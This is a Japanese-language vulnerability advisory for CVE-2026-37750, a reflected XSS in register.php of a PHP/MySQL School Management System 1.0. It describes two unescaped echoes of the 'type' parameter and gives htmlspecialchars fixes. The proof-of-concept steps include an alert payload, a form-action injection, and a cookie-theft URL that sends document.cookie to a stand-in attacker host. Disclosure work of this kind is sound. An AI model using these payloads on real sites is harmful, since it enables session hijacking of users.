| フィールド | 情報 |
|---|
| CVE ID | CVE-2026-37750 |
| タイプ | 反射型クロスサイトスクリプティング(XSS) |
| 深刻度 | 中(CVSSv3: 6.1) |
| ベンダー | mahmoudai1 |
| 製品 | School Management System |
| バージョン | 1.0 |
| 発見者 | Varad AP Mene |
| 日付 | 2026-04-16 |
| CWE | CWE-79 |
mahmoudai1によるSchool Management System 1.0の反射型クロスサイトスクリプティング(XSS)脆弱性により、認証されていないリモート攻撃者が、register.phpのサニタイズされていないtypeパラメータを介して、被害者のブラウザで任意のJavaScriptを実行できます。このパラメータは、22行目のh1タグ内と26行目のform action属性内でエスケープされずに反映されます。この脆弱性を悪用するために認証は必要ありません。
CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 中(AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
School Management System 1.0は、mahmoudai1がGitHubで公開しているPHP/MySQLウェブアプリケーションで、学校における生徒、教師、保護者の管理に使用されます。
register.php — 登録フォーム(認証不要)
22行目: echo ucfirst($_REQUEST['type'])
26行目: echo $_REQUEST['type']
htmlspecialchars()が使用されていない — 生のユーザー入力がそのままHTMLに反映されます。
前提条件:
ステップ1 — ブラウザを開き、このURLにアクセスします: http://target/register.php?type=script-alert-document.cookie-/script
ステップ2 — ブラウザでJavaScriptが実行されます 結果: セッションクッキーを表示するアラートボックスが表示されます。
ステップ3 — クッキー窃取ペイロード: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script ステップ4 — フォームアクション注入ペイロード: http://target/register.php?type="-script-alert(1)-/script
確認された2つの注入ポイント:
注入ポイント1 — h1タグ内(22行目):
echo ucfirst($_REQUEST['type'])
出力:
<h1><script>alert(1)</script> Application</h1>
注入ポイント2 — form action属性内(26行目):
echo $_REQUEST['type']
出力:
<form action="register.php?type=<script>alert(1)</script>">
22行目の修正: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');
26行目の修正: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');
Varad AP Mene メール: [email protected] GitHub: https://github.com/menevarad007